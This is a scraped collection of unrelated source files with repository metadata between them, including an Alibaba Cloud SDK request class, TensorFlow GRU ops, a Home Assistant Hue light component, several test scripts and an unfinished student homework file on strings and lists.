# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
class InnerGetSolutionRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'Workbench-inner', '2021-01-21', 'InnerGetSolution')
self.set_method('POST')
def get_CurrentOrgId(self):
return self.get_query_params().get('CurrentOrgId')
def set_CurrentOrgId(self,CurrentOrgId):
self.add_query_param('CurrentOrgId',CurrentOrgId)
def get_SolutionId(self):
return self.get_query_params().get('SolutionId')
def set_SolutionId(self,SolutionId):
self.add_query_param('SolutionId',SolutionId)
def get_UserId(self):
return self.get_query_params().get('UserId')
def set_UserId(self,UserId):
self.add_query_param('UserId',UserId)
|
[
"sdk-team@alibabacloud.com"
] |
sdk-team@alibabacloud.com
|
ad4b2dc8435b7049cde996a489f1a5cd634e4b65
|
61050d0d7f0c0a60474e4e85d30be4e5ea7c6b04
|
/vnf/scripting/itask.py
|
7ce7e28ed7a4fa2376510dad889f520aecf393de
|
[] |
no_license
|
danse-inelastic/vnf
|
8173f06f32b4a2fa2b71fddfe0fecf9c19e05e9a
|
be989448577f14f424aca4ce852c7198304ca57b
|
refs/heads/master
| 2021-01-22T01:06:00.294100
| 2015-05-02T23:25:45
| 2015-05-02T23:25:45
| 34,947,878
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,037
|
py
|
# -*- Python -*-
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# Jiao Lin
# California Institute of Technology
# (C) 2006-2011 All Rights Reserved
#
# {LicenseText}
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
def waitForITaskToFinish(taskid, credential):
from . import run
import time
while 1:
taskstatus = run(
actor='itask',
routine='getStatus',
id = taskid,
credential = credential,
)
# eval to a dictionary
taskstatus = eval(taskstatus)
# check status
if taskstatus['state'] in ['finished', 'failed', 'cancelled']:
break
time.sleep(5)
continue
if taskstatus['state'] != 'finished':
raise RuntimeError, "itask %s %s" % (taskid, taskstatus['state'])
return
# version
__id__ = "$Id$"
# End of file
|
[
"linjiao@caltech.edu"
] |
linjiao@caltech.edu
|
6d78cb4e690e54c41470accfc57a37d54d557d9b
|
7002919119e429faac734099bb18d75047e49673
|
/data/course/migrations/0002_auto_20201012_1724.py
|
7a34d9c9167def4aad8410dc81a0960926d33509
|
[] |
no_license
|
Polydelta-ai/competency_model_prototype
|
47f86353a4157f68f8e3a6fd961223bd81fa3c23
|
8162ec6df5679143e3f3165a3779c1619f9c925f
|
refs/heads/main
| 2022-12-30T19:21:41.044344
| 2020-10-14T11:09:37
| 2020-10-14T11:09:37
| 301,813,276
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,300
|
py
|
# Generated by Django 3.0 on 2020-10-12 21:24
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('course', '0001_initial'),
]
operations = [
migrations.RemoveField(
model_name='course',
name='groups',
),
migrations.RemoveField(
model_name='course',
name='objectives',
),
migrations.RemoveField(
model_name='course',
name='overview',
),
migrations.RemoveField(
model_name='course',
name='target_audience',
),
migrations.AddField(
model_name='course',
name='bureau',
field=models.CharField(max_length=256, null=True),
),
migrations.AddField(
model_name='course',
name='category',
field=models.CharField(max_length=256, null=True),
),
migrations.AddField(
model_name='course',
name='duration',
field=models.CharField(max_length=256, null=True),
),
migrations.AddField(
model_name='course',
name='type',
field=models.CharField(max_length=256, null=True),
),
]
|
[
"adrian@webb.sh"
] |
adrian@webb.sh
|
b7044d0662504d59b77b29979428fa9a0beec204
|
fbbe424559f64e9a94116a07eaaa555a01b0a7bb
|
/Tensorflow_Pandas_Numpy/source3.6/tensorflow/contrib/rnn/python/ops/gru_ops.py
|
75536e3f5f8cbe44231f19d4d455537e654f7a08
|
[
"MIT"
] |
permissive
|
ryfeus/lambda-packs
|
6544adb4dec19b8e71d75c24d8ed789b785b0369
|
cabf6e4f1970dc14302f87414f170de19944bac2
|
refs/heads/master
| 2022-12-07T16:18:52.475504
| 2022-11-29T13:35:35
| 2022-11-29T13:35:35
| 71,386,735
| 1,283
| 263
|
MIT
| 2022-11-26T05:02:14
| 2016-10-19T18:22:39
|
Python
|
UTF-8
|
Python
| false
| false
| 7,762
|
py
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Python wrapper for the Block GRU Op."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.contrib.rnn.ops import gen_gru_ops
from tensorflow.contrib.util import loader
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import rnn_cell_impl
from tensorflow.python.ops import variable_scope as vs
from tensorflow.python.platform import resource_loader
from tensorflow.python.util.deprecation import deprecated_args
_gru_ops_so = loader.load_op_library(
resource_loader.get_path_to_datafile("_gru_ops.so"))
@ops.RegisterGradient("GRUBlockCell")
def _GRUBlockCellGrad(op, *grad):
r"""Gradient for GRUBlockCell.
Args:
op: Op for which the gradient is defined.
*grad: Gradients of the optimization function wrt output
for the Op.
Returns:
d_x: Gradients wrt to x
d_h: Gradients wrt to h
d_w_ru: Gradients wrt to w_ru
d_w_c: Gradients wrt to w_c
d_b_ru: Gradients wrt to b_ru
d_b_c: Gradients wrt to b_c
Mathematics behind the Gradients below:
```
d_c_bar = d_h \circ (1-u) \circ (1-c \circ c)
d_u_bar = d_h \circ (h-c) \circ u \circ (1-u)
d_r_bar_u_bar = [d_r_bar d_u_bar]
[d_x_component_1 d_h_prev_component_1] = d_r_bar_u_bar * w_ru^T
[d_x_component_2 d_h_prevr] = d_c_bar * w_c^T
d_x = d_x_component_1 + d_x_component_2
d_h_prev = d_h_prev_component_1 + d_h_prevr \circ r + u
```
Below calculation is performed in the python wrapper for the Gradients
(not in the gradient kernel.)
```
d_w_ru = x_h_prevr^T * d_c_bar
d_w_c = x_h_prev^T * d_r_bar_u_bar
d_b_ru = sum of d_r_bar_u_bar along axis = 0
d_b_c = sum of d_c_bar along axis = 0
```
"""
x, h_prev, w_ru, w_c, b_ru, b_c = op.inputs
r, u, c, _ = op.outputs
_, _, _, d_h = grad
d_x, d_h_prev, d_c_bar, d_r_bar_u_bar = gen_gru_ops.gru_block_cell_grad(
x, h_prev, w_ru, w_c, b_ru, b_c, r, u, c, d_h)
x_h_prev = array_ops.concat([x, h_prev], 1)
d_w_ru = math_ops.matmul(x_h_prev, d_r_bar_u_bar, transpose_a=True)
d_b_ru = nn_ops.bias_add_grad(d_r_bar_u_bar)
x_h_prevr = array_ops.concat([x, h_prev * r], 1)
d_w_c = math_ops.matmul(x_h_prevr, d_c_bar, transpose_a=True)
d_b_c = nn_ops.bias_add_grad(d_c_bar)
return d_x, d_h_prev, d_w_ru, d_w_c, d_b_ru, d_b_c
class GRUBlockCell(rnn_cell_impl.RNNCell):
r"""Block GRU cell implementation.
Deprecated: use GRUBlockCellV2 instead.
The implementation is based on: http://arxiv.org/abs/1406.1078
Computes the GRU cell forward propagation for 1 time step.
This kernel op implements the following mathematical equations:
Biases are initialized with:
* `b_ru` - constant_initializer(1.0)
* `b_c` - constant_initializer(0.0)
```
x_h_prev = [x, h_prev]
[r_bar u_bar] = x_h_prev * w_ru + b_ru
r = sigmoid(r_bar)
u = sigmoid(u_bar)
h_prevr = h_prev \circ r
x_h_prevr = [x h_prevr]
c_bar = x_h_prevr * w_c + b_c
c = tanh(c_bar)
h = (1-u) \circ c + u \circ h_prev
```
"""
@deprecated_args(None, "cell_size is deprecated, use num_units instead",
"cell_size")
def __init__(self, num_units=None, cell_size=None):
"""Initialize the Block GRU cell.
Args:
num_units: int, The number of units in the GRU cell.
cell_size: int, The old (deprecated) name for `num_units`.
Raises:
ValueError: if both cell_size and num_units are not None;
or both are None.
"""
if (cell_size is None) == (num_units is None):
raise ValueError("Exactly one of num_units or cell_size must be provided.")
if num_units is None:
num_units = cell_size
self._cell_size = num_units
@property
def state_size(self):
return self._cell_size
@property
def output_size(self):
return self._cell_size
def __call__(self, x, h_prev, scope=None):
"""GRU cell."""
with vs.variable_scope(scope or type(self).__name__):
input_size = x.get_shape().with_rank(2)[1]
# Check if the input size exist.
if input_size is None:
raise ValueError("Expecting input_size to be set.")
# Check cell_size == state_size from h_prev.
cell_size = h_prev.get_shape().with_rank(2)[1]
if cell_size != self._cell_size:
raise ValueError("Shape of h_prev[1] incorrect: cell_size %i vs %s" %
(self._cell_size, cell_size))
if cell_size is None:
raise ValueError("cell_size from `h_prev` should not be None.")
w_ru = vs.get_variable("w_ru", [input_size + self._cell_size,
self._cell_size * 2])
b_ru = vs.get_variable(
"b_ru", [self._cell_size * 2],
initializer=init_ops.constant_initializer(1.0))
w_c = vs.get_variable("w_c",
[input_size + self._cell_size, self._cell_size])
b_c = vs.get_variable(
"b_c", [self._cell_size],
initializer=init_ops.constant_initializer(0.0))
_gru_block_cell = gen_gru_ops.gru_block_cell # pylint: disable=invalid-name
_, _, _, new_h = _gru_block_cell(
x=x, h_prev=h_prev, w_ru=w_ru, w_c=w_c, b_ru=b_ru, b_c=b_c)
return new_h, new_h
class GRUBlockCellV2(GRUBlockCell):
"""Temporary GRUBlockCell impl with a different variable naming scheme.
Only differs from GRUBlockCell by variable names.
"""
def __call__(self, x, h_prev, scope=None):
"""GRU cell."""
with vs.variable_scope(scope or type(self).__name__):
input_size = x.get_shape().with_rank(2)[1]
# Check if the input size exist.
if input_size is None:
raise ValueError("Expecting input_size to be set.")
# Check cell_size == state_size from h_prev.
cell_size = h_prev.get_shape().with_rank(2)[1]
if cell_size != self._cell_size:
raise ValueError("Shape of h_prev[1] incorrect: cell_size %i vs %s" %
(self._cell_size, cell_size))
if cell_size is None:
raise ValueError("cell_size from `h_prev` should not be None.")
with vs.variable_scope("gates"):
w_ru = vs.get_variable("kernel", [input_size + self._cell_size,
self._cell_size * 2])
b_ru = vs.get_variable(
"bias", [self._cell_size * 2],
initializer=init_ops.constant_initializer(1.0))
with vs.variable_scope("candidate"):
w_c = vs.get_variable("kernel",
[input_size + self._cell_size, self._cell_size])
b_c = vs.get_variable(
"bias", [self._cell_size],
initializer=init_ops.constant_initializer(0.0))
_gru_block_cell = gen_gru_ops.gru_block_cell # pylint: disable=invalid-name
_, _, _, new_h = _gru_block_cell(
x=x, h_prev=h_prev, w_ru=w_ru, w_c=w_c, b_ru=b_ru, b_c=b_c)
return new_h, new_h
|
[
"ryfeus@gmail.com"
] |
ryfeus@gmail.com
|
8d61d262ed2d32d78b76380c88292faa89d7ea96
|
d125c002a6447c3f14022b786b07712a7f5b4974
|
/tests/bugs/core_0859_test.py
|
e3bbec9126ee000bf0fd91d4a9fcfd15bf56912b
|
[
"MIT"
] |
permissive
|
FirebirdSQL/firebird-qa
|
89d5b0035071f9f69d1c869997afff60c005fca9
|
cae18186f8c31511a7f68248b20f03be2f0b97c6
|
refs/heads/master
| 2023-08-03T02:14:36.302876
| 2023-07-31T23:02:56
| 2023-07-31T23:02:56
| 295,681,819
| 3
| 2
|
MIT
| 2023-06-16T10:05:55
| 2020-09-15T09:41:22
|
Python
|
UTF-8
|
Python
| false
| false
| 1,291
|
py
|
#coding:utf-8
"""
ID: issue-1249
ISSUE: 1249
TITLE: Sorting is allowed for blobs and arrays
DESCRIPTION:
NOTES:
For now we test that such operations raise an exception, as we restored the legacy
behavior until we're able to implement DISTINCT for blobs properly,
JIRA: CORE-859
FBTEST: bugs.core_0859
"""
import pytest
from firebird.qa import *
from firebird.driver import DatabaseError
init_script = """create table t (i integer, b blob sub_type text, a integer [5]);
"""
db = db_factory(init=init_script)
act = python_act('db')
@pytest.mark.version('>=3')
def test_1(act: Action):
with act.db.connect() as con:
c = con.cursor()
# Use with to free the Statement immediately
with c.prepare('select * from t order by b'):
pass
with pytest.raises(DatabaseError, match='.*Datatype ARRAY is not supported for sorting operation.*'):
c.prepare('select * from t order by a')
# Use with to free the Statement immediately
with c.prepare('select b, count(*) from t group by b'):
pass
with pytest.raises(DatabaseError, match='.*Datatype ARRAY is not supported for sorting operation.*'):
c.prepare('select a, count(*) from t group by a')
# Passed.
|
[
"pcisar@ibphoenix.cz"
] |
pcisar@ibphoenix.cz
|
9eab2697aa461aa64c7d4d36bb6a56ea7a48521d
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/otherforms/_brands.py
|
764cf25e586cb39ea7275ee9a182cbf0ea77c8e2
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379
| 2017-01-28T02:00:50
| 2017-01-28T02:00:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 218
|
py
|
#calss header
class _BRANDS():
def __init__(self,):
self.name = "BRANDS"
self.definitions = brand
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['brand']
|
[
"xingwang1991@gmail.com"
] |
xingwang1991@gmail.com
|
f953387192ad4b6709f38021023a8739e849e939
|
3ed70536d4d06b2ac43b64976ddc43a5d7025b31
|
/uri2253.py
|
06119c5d13870da281433a9120affdffd464344a
|
[] |
no_license
|
LuisHenrique01/Questoes_URI
|
7f1d397e3cd055349939184603eb86cb4bf43d65
|
35c8e77eb7cd9da96df4268b5d71f3ad87446c89
|
refs/heads/master
| 2020-07-22T08:12:12.700484
| 2020-04-12T17:39:29
| 2020-04-12T17:39:29
| 207,126,339
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 924
|
py
|
def main():
while True:
try:
senha = input()
num = False
ma = False
mi = False
eh_l = True
if len(senha) < 6 or len(senha) > 32:
print('Senha invalida.')
else:
for i in range(len(senha)):
if ord(senha[i]) > 47 and ord(senha[i]) < 58:
num = True
elif ord(senha[i]) > 64 and ord(senha[i]) < 91:
ma = True
elif ord(senha[i]) > 96 and ord(senha[i]) < 123:
mi = True
else:
eh_l = False
if num and mi and ma and eh_l:
print('Senha valida.')
else:
print('Senha invalida.')
except EOFError:
break
if __name__ == "__main__":
main()
|
[
"luizbueno1201@gmail.com"
] |
luizbueno1201@gmail.com
|
056a5a7fd69c9b3926985847bd9c38c278137345
|
c885e1ca19bb24f167f5284c020673246a0fc260
|
/synthesis/experiments/cnf_batch.py
|
f60be95380335a8023939af372da650722d5b95b
|
[] |
no_license
|
suomela/counting
|
6c800a2c9c56c44d0b8aac8117c79c78e6b92d8b
|
5a9f96f6cabdbb54d2cd24da014aff31f4baf05d
|
refs/heads/master
| 2022-02-25T23:07:03.078165
| 2022-01-27T19:08:49
| 2022-01-27T19:08:49
| 9,413,189
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 680
|
py
|
#! /usr/bin/env python
import os.path
import sys
PATH = sys.argv[1]
SOLVER = sys.argv[5]
SEED = int(sys.argv[4])
RANDOM_SEEDS = int(sys.argv[3])
PREFIX_PATH = sys.argv[2]
from batch import *
def cmd_out(**params):
prefix = "{path}/n{nodes}-s{states}-f{faulty}-t{time}-{cyclicity}-{id}-seed{seed}".format(path=PREFIX_PATH, **params)
cmd = "{path} -solver={solver} -outdir={prefix} -nodes={nodes} -states={states} -time={time} -faulty={faulty} -{cyclicity} -seed={seed}".format(path=PATH, solver=SOLVER, prefix=prefix, **params)
return cmd
import sys
params_list = read_list(sys.stdin)
output_batch(params_list, cmd_out, sys.stdout, RANDOM_SEEDS, master_seed=SEED)
|
[
"jukka.suomela@iki.fi"
] |
jukka.suomela@iki.fi
|
34d2fc4a840a02f8646dcc1a23a0e36187588c06
|
ffd5e689f88c49ab7af3554c22dc0c36301084fa
|
/longest_common_subsequence.py
|
aa5fed409ca1f399f6f93be3e79b73ae04292dfd
|
[] |
no_license
|
ellismckenzielee/codewars-python
|
1710e6f0499047139479de386927c7dbd5f1cdf6
|
af3f4b4534798a58115d0565730aae28ce87437e
|
refs/heads/master
| 2023-08-09T13:38:40.964141
| 2023-08-01T14:45:22
| 2023-08-01T14:45:22
| 168,981,376
| 45
| 18
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 743
|
py
|
#longest common subsequence kata
#https://www.codewars.com/kata/52756e5ad454534f220001ef
def lcs(x, y):
x = list(filter(lambda x1: x1 in y,x))
y = list(filter(lambda x1: x1 in x,y))
if [] in (x,y):
return ''
elif x == y:
return ''.join(x)
else:
both = [x, y]
lens = [len(x), len(y)]
mindex = lens.index(min(lens[0],lens[1]))
maxdex = lens.index(max(lens[0],lens[1]))
output = ''
for i, letter in enumerate(both[mindex]):
try :
index = both[maxdex].index(letter)
both[maxdex] = both[maxdex][index:]
output += letter
except:
continue
return output
|
[
"ellismckenzielee@gmail.com"
] |
ellismckenzielee@gmail.com
|
e5b3b507e9fa57753b9a2e6d8e08d05cc8cbe038
|
ce20062fedae07a1f0ea00a7e5ab0b86e05ebe69
|
/pytests_stale/cbas/cbas_sql++_composability.py
|
0c58a774b01ed031c02d263c49c8a3c878c82beb
|
[
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
AnithaKuberan/TAF
|
256f9ee850275be5461e4d19a671c9dd19edb9f5
|
9824c6a4f1680c320ab065e23c720ffa92d530d9
|
refs/heads/master
| 2022-03-18T16:17:08.876692
| 2022-03-03T09:57:52
| 2022-03-03T09:57:52
| 206,016,123
| 0
| 0
|
Apache-2.0
| 2019-09-03T07:30:18
| 2019-09-03T07:30:18
| null |
UTF-8
|
Python
| false
| false
| 3,323
|
py
|
'''
Created on Mar 8, 2018
@author: riteshagarwal
'''
'''
Created on Jan 4, 2018
@author: riteshagarwal
'''
import json
import os
import time
from cbas_base import CBASBaseTest, TestInputSingleton
from lib.memcached.helper.data_helper import MemcachedClientHelper
from membase.api.rest_client import RestConnection
from remote.remote_util import RemoteMachineShellConnection
class SQLPP_Composability_CBAS(CBASBaseTest):
def setUp(self):
self.input = TestInputSingleton.input
self.input.test_params.update({"default_bucket":False})
super(SQLPP_Composability_CBAS, self).setUp()
if "add_all_cbas_nodes" in self.input.test_params and self.input.test_params["add_all_cbas_nodes"] and len(self.cluster.cbas_nodes) > 0:
self.otpNodes.append(self.add_all_nodes_then_rebalance(self.cluster.cbas_nodes))
self.shell = RemoteMachineShellConnection(self.cbas_node)
def tearDown(self):
super(SQLPP_Composability_CBAS, self).tearDown()
def test_composability(self):
bucket_username = "cbadminbucket"
bucket_password = "password"
url = 'http://{0}:8095/analytics/service'.format(self.cbas_node.ip)
files_dict={'union':['non_unary_subplan_01_1_ddl.sqlpp',
'non_unary_subplan_01.2.update.sqlpp',
'non_unary_subplan_01.3.query.sqlpp',
'non_unary_subplan_01.4.query.sqlpp',
'non_unary_subplan_01.5.query.sqlpp',
'non_unary_subplan_01.6.query.sqlpp'],
'inner-join':['non_unary_subplan_02.1.ddl.sqlpp',
'non_unary_subplan_02.2.update.sqlpp',
'non_unary_subplan_02.3.query.sqlpp',
'non_unary_subplan_02.4.query.sqlpp',
'non_unary_subplan_02.5.query.sqlpp',
'non_unary_subplan_02.6.query.sqlpp'],
'outer-join':[
]
}
for key in files_dict.keys():
for query_file in files_dict[key]:
cmd = 'curl -s --data pretty=true --data-urlencode "statement@'+os.getcwd()+'/b/resources/non_unary_subplan_01/%s" '%query_file + url + " -u " + bucket_username + ":" + bucket_password
output, error = self.shell.execute_command(cmd)
response = ""
for line in output:
response = response + line
response = json.loads(response)
self.log.info(response)
if "errors" in response:
errors = response["errors"]
else:
errors = None
if "results" in response:
results = response["results"]
else:
results = None
if "handle" in response:
handle = response["handle"]
else:
handle = None
self.assertTrue(response["status"] == "success")
self.shell.disconnect()
|
[
"ritesh.agarwal@couchbase.com"
] |
ritesh.agarwal@couchbase.com
|
eef1da102ec3c444d29d4f92f426ecbc184f2898
|
1d928c3f90d4a0a9a3919a804597aa0a4aab19a3
|
/python/core/2015/12/hue.py
|
77672c9aaf56db21fbbfaa6f7afeb2d80e53470e
|
[] |
no_license
|
rosoareslv/SED99
|
d8b2ff5811e7f0ffc59be066a5a0349a92cbb845
|
a062c118f12b93172e31e8ca115ce3f871b64461
|
refs/heads/main
| 2023-02-22T21:59:02.703005
| 2021-01-28T19:40:51
| 2021-01-28T19:40:51
| 306,497,459
| 1
| 1
| null | 2020-11-24T20:56:18
| 2020-10-23T01:18:07
| null |
UTF-8
|
Python
| false
| false
| 7,899
|
py
|
"""
homeassistant.components.light.hue
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Support for Hue lights.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/light.hue/
"""
import json
import logging
import os
import socket
import random
from datetime import timedelta
from urllib.parse import urlparse
from homeassistant.loader import get_component
import homeassistant.util as util
import homeassistant.util.color as color_util
from homeassistant.const import CONF_HOST, DEVICE_DEFAULT_NAME
from homeassistant.components.light import (
Light, ATTR_BRIGHTNESS, ATTR_XY_COLOR, ATTR_COLOR_TEMP,
ATTR_TRANSITION, ATTR_FLASH, FLASH_LONG, FLASH_SHORT,
ATTR_EFFECT, EFFECT_COLORLOOP, EFFECT_RANDOM, ATTR_RGB_COLOR)
REQUIREMENTS = ['phue==0.8']
MIN_TIME_BETWEEN_SCANS = timedelta(seconds=10)
MIN_TIME_BETWEEN_FORCED_SCANS = timedelta(milliseconds=100)
PHUE_CONFIG_FILE = "phue.conf"
# Map ip to request id for configuring
_CONFIGURING = {}
_LOGGER = logging.getLogger(__name__)
def _find_host_from_config(hass):
""" Attempt to detect host based on existing configuration. """
path = hass.config.path(PHUE_CONFIG_FILE)
if not os.path.isfile(path):
return None
try:
with open(path) as inp:
return next(json.loads(''.join(inp)).keys().__iter__())
except (ValueError, AttributeError, StopIteration):
# ValueError if can't parse as JSON
# AttributeError if JSON value is not a dict
# StopIteration if no keys
return None
def setup_platform(hass, config, add_devices_callback, discovery_info=None):
""" Gets the Hue lights. """
if discovery_info is not None:
host = urlparse(discovery_info[1]).hostname
else:
host = config.get(CONF_HOST, None)
if host is None:
host = _find_host_from_config(hass)
if host is None:
_LOGGER.error('No host found in configuration')
return False
# Only act if we are not already configuring this host
if host in _CONFIGURING:
return
setup_bridge(host, hass, add_devices_callback)
def setup_bridge(host, hass, add_devices_callback):
""" Setup a phue bridge based on host parameter. """
import phue
try:
bridge = phue.Bridge(
host,
config_file_path=hass.config.path(PHUE_CONFIG_FILE))
except ConnectionRefusedError: # Wrong host was given
_LOGGER.exception("Error connecting to the Hue bridge at %s", host)
return
except phue.PhueRegistrationException:
_LOGGER.warning("Connected to Hue at %s but not registered.", host)
request_configuration(host, hass, add_devices_callback)
return
# If we came here and configuring this host, mark as done
if host in _CONFIGURING:
request_id = _CONFIGURING.pop(host)
configurator = get_component('configurator')
configurator.request_done(request_id)
lights = {}
@util.Throttle(MIN_TIME_BETWEEN_SCANS, MIN_TIME_BETWEEN_FORCED_SCANS)
def update_lights():
""" Updates the Hue light objects with latest info from the bridge. """
try:
api = bridge.get_api()
except socket.error:
# socket.error when we cannot reach Hue
_LOGGER.exception("Cannot reach the bridge")
return
api_states = api.get('lights')
if not isinstance(api_states, dict):
_LOGGER.error("Got unexpected result from Hue API")
return
new_lights = []
for light_id, info in api_states.items():
if light_id not in lights:
lights[light_id] = HueLight(int(light_id), info,
bridge, update_lights)
new_lights.append(lights[light_id])
else:
lights[light_id].info = info
if new_lights:
add_devices_callback(new_lights)
update_lights()
def request_configuration(host, hass, add_devices_callback):
""" Request configuration steps from the user. """
configurator = get_component('configurator')
# We got an error if this method is called while we are configuring
if host in _CONFIGURING:
configurator.notify_errors(
_CONFIGURING[host], "Failed to register, please try again.")
return
# pylint: disable=unused-argument
def hue_configuration_callback(data):
""" Actions to do when our configuration callback is called. """
setup_bridge(host, hass, add_devices_callback)
_CONFIGURING[host] = configurator.request_config(
hass, "Philips Hue", hue_configuration_callback,
description=("Press the button on the bridge to register Philips Hue "
"with Home Assistant."),
description_image="/static/images/config_philips_hue.jpg",
submit_caption="I have pressed the button"
)
class HueLight(Light):
""" Represents a Hue light """
def __init__(self, light_id, info, bridge, update_lights):
self.light_id = light_id
self.info = info
self.bridge = bridge
self.update_lights = update_lights
@property
def unique_id(self):
""" Returns the id of this Hue light """
return "{}.{}".format(
self.__class__, self.info.get('uniqueid', self.name))
@property
def name(self):
""" Get the mame of the Hue light. """
return self.info.get('name', DEVICE_DEFAULT_NAME)
@property
def brightness(self):
""" Brightness of this light between 0..255. """
return self.info['state']['bri']
@property
def xy_color(self):
""" XY color value. """
return self.info['state'].get('xy')
@property
def color_temp(self):
""" CT color value. """
return self.info['state'].get('ct')
@property
def is_on(self):
""" True if device is on. """
self.update_lights()
return self.info['state']['reachable'] and self.info['state']['on']
def turn_on(self, **kwargs):
""" Turn the specified or all lights on. """
command = {'on': True}
if ATTR_TRANSITION in kwargs:
command['transitiontime'] = kwargs[ATTR_TRANSITION] * 10
if ATTR_BRIGHTNESS in kwargs:
command['bri'] = kwargs[ATTR_BRIGHTNESS]
if ATTR_XY_COLOR in kwargs:
command['xy'] = kwargs[ATTR_XY_COLOR]
elif ATTR_RGB_COLOR in kwargs:
command['xy'] = color_util.color_RGB_to_xy(
*(int(val) for val in kwargs[ATTR_RGB_COLOR]))
if ATTR_COLOR_TEMP in kwargs:
command['ct'] = kwargs[ATTR_COLOR_TEMP]
flash = kwargs.get(ATTR_FLASH)
if flash == FLASH_LONG:
command['alert'] = 'lselect'
elif flash == FLASH_SHORT:
command['alert'] = 'select'
else:
command['alert'] = 'none'
effect = kwargs.get(ATTR_EFFECT)
if effect == EFFECT_COLORLOOP:
command['effect'] = 'colorloop'
elif effect == EFFECT_RANDOM:
command['hue'] = random.randrange(0, 65535)
command['sat'] = random.randrange(150, 254)
else:
command['effect'] = 'none'
self.bridge.set_light(self.light_id, command)
def turn_off(self, **kwargs):
""" Turn the specified or all lights off. """
command = {'on': False}
if ATTR_TRANSITION in kwargs:
# Transition time is in 1/10th seconds and cannot exceed
# 900 seconds.
command['transitiontime'] = min(9000, kwargs[ATTR_TRANSITION] * 10)
self.bridge.set_light(self.light_id, command)
def update(self):
""" Synchronize state with bridge. """
self.update_lights(no_throttle=True)
|
[
"rodrigosoaresilva@gmail.com"
] |
rodrigosoaresilva@gmail.com
|
d6a628d30cd50796fad7346cedd8050cae518409
|
f87f51ec4d9353bc3836e22ac4a944951f9c45c0
|
/.history/HW03_20210706185704.py
|
4de89390673cdc7ea96c6258834fddd35d0d6aae
|
[] |
no_license
|
sanjayMamidipaka/cs1301
|
deaffee3847519eb85030d1bd82ae11e734bc1b7
|
9ddb66596497382d807673eba96853a17884d67b
|
refs/heads/main
| 2023-06-25T04:52:28.153535
| 2021-07-26T16:42:44
| 2021-07-26T16:42:44
| 389,703,530
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,061
|
py
|
"""
Georgia Institute of Technology - CS1301
HW03 - Strings and Lists
Collaboration Statement:
"""
#########################################
"""
Function Name: movieNight()
Parameters: subtitle (str)
Returns: fixed subtitle (str)
"""
#########################################
########## WRITE FUNCTION HERE ##########
#########################################
def movieNight(subtitle):
newSubtitle = ''
for i in subtitle:
if not i.isdigit():
newSubtitle += i
return newSubtitle
"""
Function Name: longestWord()
Parameters: sentence (str)
Returns: longest word (str)
"""
#########################################
########## WRITE FUNCTION HERE ##########
#########################################
def longestWord(sentence):
newSentence = ''
for i in sentence:
if not i == ',':
newSentence += i
list1 = newSentence.split(' ')
length = 0
longestWord = ''
for i in list1:
if len(i) >= length:
length = len(i)
longestWord = i
return longestWord
"""
Function Name: tennisMatch()
Parameters: player1 (str), player2 (str), matchRecord (str)
Returns: game statement (str)
"""
#########################################
########## WRITE FUNCTION HERE ##########
#########################################
def tennisMatch(player1, player2, matchRecord):
player1Points = 0
player2Points = 0
matchesWonPlayer1 = 0
matchesWonPlayer2 = 0
for i in matchRecord:
if i == '1':
player1Points += 1
elif i == '2':
player2Points += 1
elif i == '-':
if player1Points > player2Points:
matchesWonPlayer1 += 1
elif player2Points > player1Points:
matchesWonPlayer2 += 1
player1Points = 0
player2Points = 0
if matchesWonPlayer1 > matchesWonPlayer2:
return player1 + ' won! The score was ' + str(matchesWonPlayer1) + str('-') + str(matchesWonPlayer2)
elif matchesWonPlayer2 > matchesWonPlayer1:
return player2 + ' won! The score was ' + str(matchesWonPlayer2) + str('-') + str(matchesWonPlayer1)
else:
return
"""
Function Name: freshFruit()
Parameters: barcodes (list), startIndex (int), stopIndex (int)
Returns: freshest barcode (int)
"""
#########################################
########## WRITE FUNCTION HERE ##########
#########################################
"""
Function Name: highestSum()
Parameters: stringList (list)
